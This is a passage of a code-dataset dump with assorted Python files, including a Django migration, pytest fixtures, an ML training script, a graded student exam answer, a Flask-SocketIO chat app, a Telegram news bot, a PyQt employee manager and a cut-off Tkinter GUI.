primary_key=True)),\n ('telefone', models.CharField(max_length=50)),\n ('contato', models.ForeignKey(to='contatos.Contato')),\n ],\n ),\n ]\n","sub_path":"contatos/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"416297446","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport time\nfrom collections import namedtuple\nfrom datetime import datetime\n\nimport mock\nimport pytest\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext import testbed\nfrom pytz import timezone\nfrom pytz import utc\n\nfrom yelp_beans import send_email\nfrom yelp_beans.logic.subscription import get_specs_from_subscription\nfrom yelp_beans.logic.subscription import store_specs_from_subscription\nfrom yelp_beans.models import MeetingSubscription\nfrom yelp_beans.models import Rule\nfrom yelp_beans.models import SubscriptionDateTime\nfrom yelp_beans.models import User\nfrom yelp_beans.models import UserSubscriptionPreferences\n\n\nFAKE_USER = [{\n 'first_name': 'Darwin',\n 'last_name': 'Yelp',\n 'email': 'darwin@yelp.com',\n 'photo_url': (\n 'https://s3-media4.fl.yelpcdn.com/assets/'\n 'srv0/yelp_large_assets/3f74899c069c'\n '/assets/img/illustrations/mascots/darwin@2x.png'\n ),\n 'department': 'Consumer',\n 'business_title': 'Engineer',\n}]\n\n\n@pytest.yield_fixture(scope='session', autouse=True)\ndef mock_config():\n with open('tests/test_data/config.yaml') as config_file:\n data = config_file.read()\n with mock.patch(\n 'yelp_beans.logic.config.open',\n mock.mock_open(read_data=data)\n ):\n yield\n\n\n@pytest.yield_fixture(scope='session', autouse=True)\ndef sendgrid_mock():\n \"\"\"This is active to prevent from sending a emails when testing\"\"\"\n with mock.patch.object(send_email, 'send_single_email'):\n yield\n\n\n@pytest.fixture\ndef 
minimal_database():\n my_testbed = testbed.Testbed()\n my_testbed.activate()\n my_testbed.init_datastore_v3_stub()\n my_testbed.init_memcache_stub()\n # Clear ndb's in-context cache between tests.\n ndb.get_context().clear_cache()\n\n\n@pytest.yield_fixture\ndef subscription():\n yield _subscription()\n\n\ndef _subscription():\n zone = 'US/Pacific'\n preference_1 = SubscriptionDateTime(datetime=datetime(2017, 1, 20, 23, 0, tzinfo=utc))\n # Easier to think/verify in Pacific time since we are based in SF\n assert preference_1.datetime.astimezone(timezone(zone)).hour == 15\n preference_1.datetime = preference_1.datetime.replace(tzinfo=None)\n preference_1.put()\n\n preference_2 = SubscriptionDateTime(datetime=datetime(2017, 1, 20, 19, 0, tzinfo=utc))\n # Easier to think/verify in Pacific time since we are based in SF\n assert preference_2.datetime.astimezone(timezone(zone)).hour == 11\n preference_2.datetime = preference_2.datetime.replace(tzinfo=None)\n preference_2.put()\n\n rule = Rule(name='office', value='USA: CA SF New Montgomery Office').put()\n\n subscription = MeetingSubscription(\n title='Yelp Weekly',\n size=2,\n location='8th Floor',\n office='USA: CA SF New Montgomery Office',\n timezone=zone,\n datetime=[preference_1.key, preference_2.key],\n user_rules=[rule]\n )\n subscription.put()\n return subscription\n\n\n@pytest.fixture\ndef database(minimal_database, subscription):\n MeetingInfo = namedtuple('MeetingInfo', ['sub', 'specs', 'prefs'])\n week_start, specs = get_specs_from_subscription(subscription)\n store_specs_from_subscription(subscription.key, week_start, specs)\n return MeetingInfo(\n subscription,\n specs,\n [\n subscription.datetime[0].get(),\n subscription.datetime[1].get()\n ]\n )\n\n\n@pytest.fixture\ndef database_no_specs(minimal_database, subscription):\n MeetingInfo = namedtuple('MeetingInfo', ['sub', 'specs', 'prefs'])\n return MeetingInfo(\n subscription,\n [],\n [\n subscription.datetime[0].get(),\n subscription.datetime[1].get()\n ]\n )\n\n\n@pytest.fixture\ndef employees():\n with open('tests/test_data/employees.json') as test_file:\n return test_file.read()\n\n\n@pytest.yield_fixture\ndef data_source():\n yield [\n {\n 'first_name': 'Sam',\n 'last_name': 'Smith',\n 'email': 'samsmith@yelp.com',\n 'photo_url': 'www.cdn.com/SamSmith.png',\n 'metadata': {\n 'department': 'Engineering',\n 'title': 'Engineer',\n 'floor': '10',\n 'desk': '100',\n 'manager': 'Bo Demillo'\n }\n },\n {\n 'first_name': 'Derrick',\n 'last_name': 'Johnson',\n 'email': 'derrickjohnson@yelp.com',\n 'photo_url': 'www.cdn.com/DerrickJohnson.png',\n 'metadata': {\n 'department': 'Design',\n 'title': 'Designer',\n 'floor': '12',\n 'desk': '102',\n 'manager': 'Tracy Borne'\n }\n }\n ]\n\n\n@pytest.yield_fixture\ndef data_source_by_key():\n yield {\n 'samsmith@yelp.com': {\n 'first_name': 'Sam',\n 'last_name': 'Smith',\n 'email': 'samsmith@yelp.com',\n 'photo_url': 'www.cdn.com/SamSmith.png',\n 'metadata': {\n 'department': 'Engineering',\n 'title': 'Engineer',\n 'floor': '10',\n 'desk': '100',\n 'manager': 'Bo Demillo'\n }\n },\n 'derrickjohnson@yelp.com': {\n 'first_name': 'Derrick',\n 'last_name': 'Johnson',\n 'email': 'derrickjohnson@yelp.com',\n 'photo_url': 'www.cdn.com/DerrickJohnson.png',\n 'metadata': {\n 'department': 'Design',\n 'title': 'Designer',\n 'floor': '12',\n 'desk': '102',\n 'manager': 'Derrick Johnson'\n }\n }\n }\n\n\n@pytest.fixture\ndef app():\n from webapp import app\n app.testing = True\n return app\n\n\n@pytest.fixture\ndef fake_user():\n yield 
_fake_user()\n\n\ndef _fake_user():\n user_list = []\n subscription = MeetingSubscription.query().get()\n for user in FAKE_USER:\n preferences = UserSubscriptionPreferences(\n preference=subscription.datetime[0],\n subscription=subscription.key,\n ).put()\n user_entity = User(\n first_name=user['first_name'],\n last_name=user['last_name'],\n email=user['email'],\n photo_url=user['photo_url'],\n metadata={\n 'department': user['department'],\n 'office': 'USA: CA SF New Montgomery Office',\n 'company_profile_url': 'https://www.yelp.com/user_details?userid=nkN_do3fJ9xekchVC-v68A',\n },\n subscription_preferences=[preferences],\n )\n user_entity.put()\n user_list.append(user_entity)\n return user_list[0]\n\n\ndef create_dev_data():\n email = FAKE_USER[0]['email']\n user = User.query(User.email == email).get()\n if not user:\n _subscription()\n time.sleep(2)\n _fake_user()\n\n subscription = MeetingSubscription.query().get()\n week_start, specs = get_specs_from_subscription(subscription)\n store_specs_from_subscription(subscription.key, week_start, specs)\n logging.info('generated fake date for dev')\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"204013226","text":"# Script to train machine learning model.\n\nfrom sklearn.model_selection import train_test_split\n\n# Add the necessary imports for the starter code.\nimport pandas as pd\nfrom ml.data import process_data\nfrom ml.model import train_model, compute_model_metrics, inference, save_to_file\nfrom data_slice import data_slice\n\nimport logging\n\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)-15s %(message)s\")\nlogger = logging.getLogger()\n\n\n# Add code to load in the data.\ndf = pd.read_csv('./data/census_no_spaces.csv')\n\n\ndef prepare_data(data):\n # Optional enhancement, use K-fold cross validation instead of a train-test split.\n train, test = train_test_split(data, test_size=0.20)\n\n cat_features = [\n \"workclass\",\n \"education\",\n \"marital-status\",\n \"occupation\",\n \"relationship\",\n \"race\",\n \"sex\",\n \"native-country\",\n ]\n feature = test[\"marital-status\"].to_numpy()\n\n X_train, y_train, encoder, lb = process_data(\n train, categorical_features=cat_features, label=\"salary\", training=True\n )\n\n # Proces the test data with the process_data function.\n X_test, y_test, test_encoder, test_lb = process_data(\n test, categorical_features=cat_features, label=\"salary\", training=False, encoder=encoder, lb=lb\n )\n\n save_to_file(encoder, \"encoder\")\n save_to_file(lb, \"labelbinarizer\")\n\n return X_train, y_train, X_test, y_test, feature\n\n\ndef train(X_train, y_train, X_test, y_test, feature):\n # Train and save a model.\n model = train_model(X_train, y_train)\n\n save_to_file(model, 'naive_bias.sav')\n\n preds = inference(model, X_test)\n\n precision, recall, fbeta = compute_model_metrics(y_test, preds)\n logger.info(f\"precision: {str(precision)} recall {str(recall)} fbeta {str(fbeta)}\")\n\n data_slice(feature, y_test, preds)\n\n\nX_train, y_train, X_test, y_test, feature = prepare_data(df)\n\ntrain(X_train, y_train, X_test, y_test, feature)\n","sub_path":"starter/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"482727165","text":"\"\"\"\r\n12.5/25 points\r\nFor this I wanted you guys to set up 
inheritance. You were close but didn't quite get there.\r\nAlso, your sides don't update to what the user inputs. \r\n\"\"\"\r\n\r\n\"\"\"\r\nPython Basics Performance Exam\r\n\r\n This exam is open note, open book, and open internet. Feel free to use any resources\r\n you can (other than someone else) to solve the following problems. Direct collaboration with another\r\n individual will result in immediate failure and consequences to follow. If you are unsure about \r\n whether or not you can use a resource please ask me. If you are unsure about any of the prompts I can clarify. \r\n\r\n Comments are necessary. \r\n\r\n Each problem will weigh the same towards the final grade. 4 Problems at 25% each. \r\n\r\n Please send each problem as a .py file separately. Please direct message them to me (Daniel Curran) \r\n through slack. If there are supporting files for a problem then please send them with the .py file \r\n as a zipped folder. \r\n\r\n You will have 3 hours to complete this exam. If you complete this portion early and I have verified\r\n I have everything needed to grade your exam then you will be released.\r\n\r\n Happy Thanksgiving. \r\n\r\n3. \r\n(The Triangle class) Design a class named Triangle that extends the\r\nGeometricObject class defined below. The Triangle class contains:\r\n - Three float data fields named side1, side2, and side3 to denote the three\r\n sides of the triangle.\r\n - A constructor that creates a triangle with the specified side1, side2, and\r\n side3 with default values 1.0.\r\n - The accessor methods for all three data fields.\r\n - A method named getArea() that returns the area of this triangle.\r\n - A method named getPerimeter() that returns the perimeter of this triangle.\r\n - A method named __str__() that returns a string description for the triangle.\r\n\r\n\r\n class GeometricObject:\r\n def __init__(self, color = \"green\", filled = True):\r\n self.color = color\r\n self.filled = filled\r\n\r\n def getColor(self):\r\n return self.color\r\n\r\n def setColor(self, color):\r\n self.color = color\r\n\r\n def isFilled(self):\r\n return self.filled\r\n\r\n def setFilled(self, filled):\r\n self.filled = filled\r\n \r\n def toString(self):\r\n return \"color: \" + self.color + \" and filled: \" + str(self.filled)\r\n\r\n\r\n Write a test program that prompts the user to enter the three sides of the \r\n triangle, a color, and 1 or 0 to indicate whether the triangle is filled. \r\n The program should create a Triangle object with these sides and set the \r\n color and filled properties using the input. The program should display the \r\n triangle’s area, perimeter, color, and True or False to indicate whether the \r\n triangle is filled or not.\r\n\r\n\"\"\"\r\n# Import the things\r\nfrom shapes1 import GeometricObject as go \r\nfrom shapes1 import TriangleObject as tr\r\n# Define the mian function\r\ndef main():\r\n # get the values to set\r\n side1 = float(input(\"Enter the length of side 1: \"))\r\n side2 = input(\"Enter the length of side 2: \")\r\n side3 = input(\"Enter the length of side 3: \")\r\n color = input(\"Enter the color you want the shape to be: \")\r\n filled = input(\"Enter 1 if you want the shape filled and 0 if you do not: \")\r\n # set the values\r\n tr.set_side1 = side1\r\n tr.set_side2 = side2\r\n tr.set_side3 = side3\r\n go.setColor = color\r\n # if the user picks a goot selection then set it. 
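    # Editorial note: per the grader's remark at the top of this record, the
    # assignment wanted inheritance, but this solution assigns to attributes
    # of the imported classes instead of constructing a Triangle instance, so
    # the entered sides are never used. A minimal corrected sketch, assuming
    # the GeometricObject class quoted in the prompt is importable:
    #
    #     import math
    #
    #     class Triangle(GeometricObject):
    #         def __init__(self, side1=1.0, side2=1.0, side3=1.0):
    #             super().__init__()
    #             self.side1, self.side2, self.side3 = side1, side2, side3
    #
    #         def getPerimeter(self):
    #             return self.side1 + self.side2 + self.side3
    #
    #         def getArea(self):
    #             s = self.getPerimeter() / 2  # Heron's formula
    #             return math.sqrt(s * (s - self.side1) *
    #                              (s - self.side2) * (s - self.side3))
    #
    #         def __str__(self):
    #             return "Triangle(side1={}, side2={}, side3={}, {})".format(
    #                 self.side1, self.side2, self.side3, self.toString())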
If not then default\r\n if filled == \"1\":\r\n go.setFilled = True\r\n elif filled == \"0\":\r\n go.setFilled = False\r\n else:\r\n print(\"You did not enter appropriate input for filling the shape so we will default: \")\r\n go.setColor = True\r\n # Display the data\r\n print(tr())\r\n print(go())\r\n \r\n \r\n\r\n\r\nmain()","sub_path":"Curriculum/My Git Stuff/05PythonProgramming/Additional Stuff/Test Stuff/First Test/Hackett_Python_Basics_Performance/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"298773389","text":"from flask import Flask, render_template,request,session\nfrom flask_socketio import SocketIO, send,emit,join_room, leave_room, ConnectionRefusedError\nimport uuid\nfrom flask_sqlalchemy import SQLAlchemy\n\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\n# socketio = SocketIO(app,logger=True, engineio_logger=True)\nsocketio = SocketIO(app)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///chat.db'\ndb = SQLAlchemy(app)\n\n\ndb.session.execute('CREATE TABLE IF NOT EXISTS user (id INTEGER PRIMARY KEY AUTOINCREMENT, email TEXT email NOT NULL UNIQUE, username TEXT)')\ndb.session.execute('CREATE TABLE IF NOT EXISTS myroom (id INTEGER PRIMARY KEY AUTOINCREMENT, roomname TEXT, key TEXT, email NOT NULL UNIQUE)')\ndb.session.commit()\n\n\n@app.route('/')\ndef home(username):\n return render_template('index.html',user=username)\n\n@app.route(\"/chat//\")\ndef generate_room_key(roomname,email):\n roomname=roomname\n email=email\n key=str(uuid.uuid1())\n # print(request.sid)\n db.engine.execute(\"INSERT INTO myroom (roomname,key,email) VALUES(?,?,?)\",(roomname,key,email))\n # print(user,request.sid)\n db.session.commit()\n data={'roomname':roomname,\"key\":key,\"email\":email}\n return data\n# @app.route('/')\n# def index(username):\n# # user=username\n# # session[\"username\"]=username\n# return render_template('session.html',user=username)\n\n@socketio.on('my event')\ndef test_message(message):\n emit('my response', {'data': message['data']})\n\n# @socketio.on('my broadcast event')\n# def test_message(message):\n# emit('my response', {'data': message['data']}, broadcast=True)\n\n_user={}\n@app.route(\"/chat/\")\ndef chat(user):\n _user[\"user\"]=user\n return render_template(\"chat.html\",user=user)\n\n@socketio.on('connect')\ndef test_connect():\n # if True:\n # raise ConnectionRefusedError('unauthorized!')\n print(\"connected\",request.sid)\n emit('my response', {'data': 'Connected'})\n\n\nroomID={}\nkey_session={}\n@socketio.on('create_room')\ndef create_room(msg):\n roomname = msg['roomname']\n _id=str(uuid.uuid1())\n roomID[roomname]=_id\n # session['username']=msg['username']\n key_session[request.sid]=_id\n\n print(roomname,roomID)\n room = _id\n join_room(room)\n emit('private_room',{'roomID':room, \"roomname\":roomname,'username':session['username']},to=room)\n # send(username + ' has entered the room.'+room, to=room)\n\n\n\n\n@socketio.on('join')\ndef join(msg):\n roomname = msg['roomname']\n _id = msg['roomID']\n\n try:\n room_and_key=db.engine.execute(\"SELECT key,roomname,email from myroom where id=?\",_id).fetchone()\n key,roomname=room_and_key[0],room_and_key[1]\n join_room(key)\n key_session[request.sid]=_user[\"user\"]\n roomname = f\"{_user['user']} has joined the room {msg['roomname']}\"\n # roomID[\"room\"]=msg['roomID']\n # print(roomname,roomID)\n print(\"this s join id:\",_id)\n print(\"ID 
check\",msg['roomID'],\"/n\",key_session[request.sid])\n emit('join',{'data':roomname, \"user\":_id}, room=key)\n # send(username + ' has entered the room.'+room, to=room)\n except:\n join_room('404')\n emit('chat',{'data':\"Roomname not found 404\", \"user\":\"entered id didn't found\"}, room='404')\n raise ConnectionRefusedError('unauthorized!')\n emit('disconnect',room='404')\n\n\n@socketio.on('my broadcast event')\ndef test_message(message):\n _id = message['room']\n # print(\"here is the room\",roomID[\"room\"])\n # print(\"here is the user\",_user[\"user\"],key_session[request.sid])\n\n room_and_key=db.engine.execute(\"SELECT key,roomname,email from myroom where id=?\",_id).fetchone()\n key,roomname=room_and_key[0],room_and_key[1]\n # if request.sid in roomID[_id]:\n emit('chat', {'data': message['data'],\"user\":key_session[request.sid]},room=key)\n\n\n@socketio.on('disconnect')\ndef test_disconnect():\n print('Client disconnected')\n emit('my response', {'data': 'DisConnected'})\n\nif __name__ == '__main__':\n socketio.run(app,debug=0)","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"587176624","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_POST\nfrom vinyl_records.models import Record\n\nfrom .models import Cart\nfrom .forms import CartAddProductForm\n\nfrom decimal import Decimal\nfrom django.conf import settings\n# Create your views here.\n\n\n@require_POST\ndef cart_add(request, record_id):\n cart = Cart(request)\n record = get_object_or_404(Record, id=record_id)\n form = CartAddProductForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n cart.add(record=record, quantity=cd['quantity'],\n update_quantity=cd['update'])\n return redirect('cart:cart_detail')\n\ndef cart_remove(request, record_id):\n cart = Cart(request)\n record = get_object_or_404(Record,id=record_id)\n cart.remove(record)\n return redirect('cart:cart_detail')\n\ndef cart_detail(request):\n cart = Cart(request)\n for item in cart:\n item['update_quantity_form'] = CartAddProductForm(\n initial={\n 'quantity': item['quantity'],\n 'update': True\n })\n return render(request, 'cart/detail.html', {'cart': cart})\n\n@require_POST\ndef cart_clear(request):\n cart = Cart(request)\n cart.clear()\n return render(request, 'cart/detail.html', {'cart': cart})\n","sub_path":"web/vinyl_shop/vinyl_shop/cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"102538109","text":"def num_distinct_islands(grid):\n def dfs(grid, row, col, path):\n if not (0 <= row < len(grid) and 0 <= col < len(grid[0]) and grid[row][col] == 1):\n return \"\"\n\n grid[row][col] = 0\n return path + dfs(grid, row - 1, col, \"d\") + \"u\" + dfs(grid, row + 1, row, col, \"u\") + \"d\" + dfs(grid, row, col - 1, \"r\") + \"l\" + dfs(grid, row, col + 1, \"l\") + \"r\"\n\n\n\n ans = set()\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n path = dfs(grid, i, j, \"s\")\n print(path)\n ans.add(path)\n\n return 
len(ans)\n\n\nprint(num_distinct_islands([[1,1,0,0,0],\n[1,1,0,0,0],\n[0,0,0,1,1],\n[0,0,0,1,1]]))\n","sub_path":"694_num_distinct_islands.py","file_name":"694_num_distinct_islands.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"447287890","text":"import argparse\nimport calendar\nimport time\n\ntime_now = calendar.timegm(time.gmtime())\n\nparser = argparse.ArgumentParser(description='--t \"\"')\nparser.add_argument(\"--t\", default=time_now, help=\"'current epoch time is `date +%s`'\")\nargs = parser.parse_args()\nt = args.t\n\n\ndef epoch():\n # print current epoch if no argument & exit\n if t == time_now:\n print(\"Current EPOCH time is: \" + (str(t)))\n exit()\n\n human_time = time.strftime('%m/%d/%Y %H:%M:%S', time.localtime(int(t)))\n print(\"Human-readable date:\\n\" + human_time)\n\n\nepoch()\n","sub_path":"lz_epoch_converter/epoch.py","file_name":"epoch.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"244984634","text":"import telebot\nimport datetime\nfrom decouple import config\nimport finnhub\nfrom time import sleep\nimport datetime\nimport schedule\nimport time\n\n\nbot = telebot.TeleBot(config('TELEGRAM_BOT_KEY'), parse_mode='HTML')\nsome_id = int('-1001515068629')\n\n\nclass Apihandler:\n def __init__(self, finnhub_client):\n self.finnhub_client = finnhub.Client(api_key=finnhub_client)\n\n def get_news(self, time_setter):\n news_list = []\n for item in self.finnhub_client.general_news('general', min_id=0):\n date_parsed = datetime.datetime.fromtimestamp(item['datetime'])\n item_hour = str(datetime.datetime.fromtimestamp(\n item['datetime'])).split(' ')[1][0:2]\n if str(date_parsed).split(' ')[0] == str(datetime.date.today()) and int(item_hour) >= time_setter:\n news_list.append(\n f\"{item['source']}: {item['headline']} \\n {item['url']} \\n {date_parsed} \\n\\n\")\n return news_list\n\n\ndef function_to_run():\n api = Apihandler(config('FINNHUBCLIENT_API_KEY'))\n\n if datetime.datetime.now().hour == 7:\n for item in api.get_news(0):\n bot.send_message(some_id, item)\n sleep(4)\n elif datetime.datetime.now().hour == 11:\n for item in api.get_news(7):\n bot.send_message(some_id, item)\n sleep(4)\n elif datetime.datetime.now().hour == 15:\n for item in api.get_news(11):\n bot.send_message(some_id, item)\n sleep(4)\n elif datetime.datetime.now().hour == 19:\n for item in api.get_news(15):\n bot.send_message(some_id, item)\n sleep(4)\n\n\nif __name__ == \"__main__\":\n schedule.every().day.at(\"07:00\").do(function_to_run)\n schedule.every().day.at(\"11:00\").do(function_to_run)\n schedule.every().day.at(\"15:00\").do(function_to_run)\n schedule.every().day.at(\"19:00\").do(function_to_run)\n\n while True:\n schedule.run_pending()\n time.sleep(1)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"125382313","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QInputDialog, QWidget, QStackedWidget\nfrom models import *\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom ui.main_window import Ui_MainWindow as Main_window\nfrom ui.new_employee_window import Ui_MainWindow as New_employee_window\nfrom table_manager import table_manager\n\nclass EmployeeManager:\n\tdef 
__init__(self):\n\t\tself.engine = create_engine('sqlite:///employee_manager.db')\n\t\tBase.metadata.create_all(self.engine)\n\t\tDBSession = sessionmaker(bind=self.engine)\n\t\tself.session = DBSession()\n\n\t\tself.employees = {}\n\t\tfor employee in self.session.query(Employee).all():\n\t\t\tself.employees[employee.id] = (employee.fullname, employee.position, employee.pay, str(employee.id))\n\n\t\tself.app = QApplication(sys.argv)\n\t\tself.window = QMainWindow()\n\n\t\tself.main_window = Main_window()\n\t\tself.new_employee_window = New_employee_window()\n\n\t\tself.focus_main()\n\n\t\tself.window.show()\n\t\tsys.exit(self.app.exec_())\n\n\tdef add_employee(self):\n\t\tname = self.new_employee_window.fullName.text()\n\t\tposition = self.new_employee_window.position.text()\n\t\tpay = self.new_employee_window.pay.text()\n\n\t\tif name != '' and position != '' and pay != '':\n\t\t\tnew_employee = Employee(fullname=name, position=position, pay=pay)\n\t\t\tself.session.add(new_employee)\n\t\t\tself.session.commit()\n\t\t\t# the primary key is only assigned on commit, so register the row afterwards (keyed by id, as everywhere else)\n\t\t\tself.employees[new_employee.id] = (new_employee.fullname, new_employee.position, new_employee.pay, str(new_employee.id))\n\t\t\tself.focus_main()\n\n\t\telse:\n\t\t\tpass\n\n\tdef edit_employee(self):\n\t\tname = self.new_employee_window.fullName.text()\n\t\tposition = self.new_employee_window.position.text()\n\t\tpay = self.new_employee_window.pay.text()\n\n\t\tif name != '' and position != '' and pay != '':\n\t\t\temployee = self.session.query(Employee).filter_by(id=self.info[3]).first()\n\t\t\temployee.fullname = name\n\t\t\temployee.position = position\n\t\t\temployee.pay = pay\n\t\t\tself.employees[employee.id] = (employee.fullname, employee.position, employee.pay, str(employee.id))\n\t\t\tself.session.commit()\n\t\t\tself.focus_main()\n\n\t\telse:\n\t\t\tpass\n\n\tdef focus_new_employee(self):\n\t\tself.new_employee_window.setupUi(self.window)\n\n\t\tself.new_employee_window.cancel.clicked.connect(self.focus_main)\n\t\tself.new_employee_window.addEmployee.clicked.connect(self.add_employee)\n\n\tdef focus_edit_employee(self):\n\t\tinfo = [i.text() for i in self.tm.table.selectedItems()]\n\t\tself.new_employee_window.setupUi(self.window)\n\n\t\tself.new_employee_window.fullName.setText(info[0])\n\t\tself.new_employee_window.position.setText(info[1])\n\t\tself.new_employee_window.pay.setText(info[2])\n\t\tself.info = info\n\n\t\tself.new_employee_window.cancel.clicked.connect(self.focus_main)\n\t\tself.new_employee_window.addEmployee.setText('Edit Employee')\n\t\tself.new_employee_window.addEmployee.clicked.connect(self.edit_employee)\n\n\tdef focus_main(self):\n\t\tself.main_window.setupUi(self.window)\n\n\t\tself.tm = table_manager(self.main_window.employeeTables)\n\n\t\tfor key, val in self.employees.items():\n\t\t\tself.tm.add_row(val)\n\t\t\t\n\t\tself.main_window.addEmployeeDialog.clicked.connect(self.focus_new_employee)\n\t\tself.tm.table.clicked.connect(self.focus_edit_employee)\n\nEmployeeManager()","sub_path":"src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"448083814","text":"from django.conf.urls import url\nfrom django.contrib import admin\n\nfrom .views import *\n\nurlpatterns = [\n url(r'^$', index, name=\"index\"),\n url(r'^about-us/$', about_us, name=\"about-us\"),\n url(r'^careers/$', careers, name=\"careers\"),\n url(r'^partners/$', partners, name=\"partners\"),\n url(r'^demo/bookings/$', demo_bookings, 
name='demo-booking'),\n]\n","sub_path":"ajabcapital/apps/website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"602608499","text":"#!/usr/bin/env python\n\nfrom tkinter import *\nimport sqlite3\nimport os\nimport tkinter as tk\n\n\n\n# Represents the GUI window.\nclass MenuGUI():\n\n def __init__(self):\n\n self.root = tk.Tk()\n self.root.title(\"GUI for store data\")\n # set the variable\n self.window_height = 700\n\n self.sidebar_width = 200\n\n self.main_area_width = 400\n\n self.sidebar_bg_color = 'white'\n\n self.mainarea_bg_color = '#CCC'\n\n # calling the sidebar method\n self._set_sidebar()\n\n # initialize the frames with empty everything\n self.mainarea_tshirt = tk.Frame(self.root)\n\n self.mainarea_posters = tk.Frame(self.root)\n\n self.mainarea_boots = tk.Frame(self.root)\n\n # calling the frame to show initially\n self._only_tshirt_show()\n\n\n def _set_sidebar(self):\n\n sidebar = tk.Frame(\n self.root, width = self.sidebar_width, bg = self.sidebar_bg_color, height = self.window_height, relief = 'sunken', borderwidth = 2)\n sidebar.pack(expand=True, fill='both', side = 'left', anchor = 'nw')\n\n # adding the T shirt button on right side-bar\n # relx and rely are the attribute which set the postsion\n\n tshirt = tk.Button(self.root, text = \"T-shirt\", command=self._only_tshirt_show)\n\n tshirt.pack()\n\n tshirt.place(bordermode = OUTSIDE, height = 50, width = self.sidebar_width, relx=.0, rely=.001)\n\n # adding the Poster button on right side-bar\n # relx and rely are the attribute which set the postsion\n posters = tk.Button(self.root, text =\"Posters\", command=self._only_posters_show)\n\n posters.pack()\n\n posters.place(bordermode = OUTSIDE, height = 50, width = self.sidebar_width,relx=.0, rely=.09)\n\n # adding the Boots button on right side-bar\n # relx and rely are the attribute which set the postsion\n\n boots = tk.Button(self.root, text =\"Boots\", command=self._only_boot_show)\n\n boots.pack()\n\n boots.place(bordermode = OUTSIDE, height = 50, width = self.sidebar_width,relx=.0, rely=.179)\n\n\n \"\"\"\n This method will hide all the displays and show only the\n t-shirt window\n \"\"\"\n def _only_tshirt_show(self):\n\n \"\"\"\n Below line destroy the all frames\n \"\"\"\n\n # destroy the all frames\n self.mainarea_tshirt.destroy()\n\n self.mainarea_posters.destroy()\n\n self.mainarea_boots.destroy()\n\n self.root.update()\n\n self.root.minsize(self.main_area_width,self.window_height)\n\n self.mainarea_tshirt = tk.Frame(self.root, bg = self.mainarea_bg_color, width = self.main_area_width, height = self.window_height)\n\n self.mainarea_tshirt.pack(expand = True, fill = 'both', side = 'right')\n\n Label(self.mainarea_tshirt, text=\"T shirt name\").pack()\n\n self._storeVar = StringVar()\n self._tablename = \"tshirts\"\n\n # adding the Entry (text-field) on frame\n # adding the button on the text field\n # command attribute in button will execute the method or command\n\n Entry(self.mainarea_tshirt, textvariable=self._storeVar, width=30).pack()\n\n Button(self.mainarea_tshirt, text=\"Enter\",width=27, command=self._enter_data).pack()\n\n self.root.mainloop()\n\n \"\"\"\n This mestod will hide all the displays and show only the\n Posters window\n \"\"\"\n def _only_posters_show(self):\n\n # destroy the all frames\n self.mainarea_tshirt.destroy()\n\n self.mainarea_posters.destroy()\n\n self.mainarea_boots.destroy()\n\n\n self.root.update()\n\n 
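# the three content frames were destroyed and pending events flushed above; now resize the window and rebuild only the posters frame\n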
self.root.minsize(self.main_area_width,self.window_height)\n\n self.mainarea_posters = tk.Frame(self.root, bg = self.mainarea_bg_color, width = self.main_area_width, height = self.window_height)\n\n self.mainarea_posters.pack(expand = True, fill = 'both', side = 'right')\n\n Label(self.mainarea_posters, text=\"Poster name\").pack()\n\n self._storeVar = StringVar()\n self._tablename = \"posters\"\n\n # adding the Entry (text-field) on frame\n # adding the button on the text field\n # command attribute in button will execute the method or command\n\n Entry(self.mainarea_posters, textvariable=self._storeVar, width=30).pack()\n\n Button(self.mainarea_posters, text=\"Enter\",width=27, command=self._enter_data).pack()\n\n self.root.mainloop()\n\n\n \"\"\"\n This mestod will hide all the displays and show only the\n Boot window\n \"\"\"\n def _only_boot_show(self):\n\n # destroy the all frames\n self.mainarea_tshirt.destroy()\n self.mainarea_posters.destroy()\n self.mainarea_boots.destroy()\n\n self.root.update()\n\n self.root.minsize(self.main_area_width,self.window_height)\n\n self.mainarea_boots = tk.Frame(self.root, bg = self.mainarea_bg_color, width = self.main_area_width, height = self.window_height)\n\n self.mainarea_boots.pack(expand = True, fill = 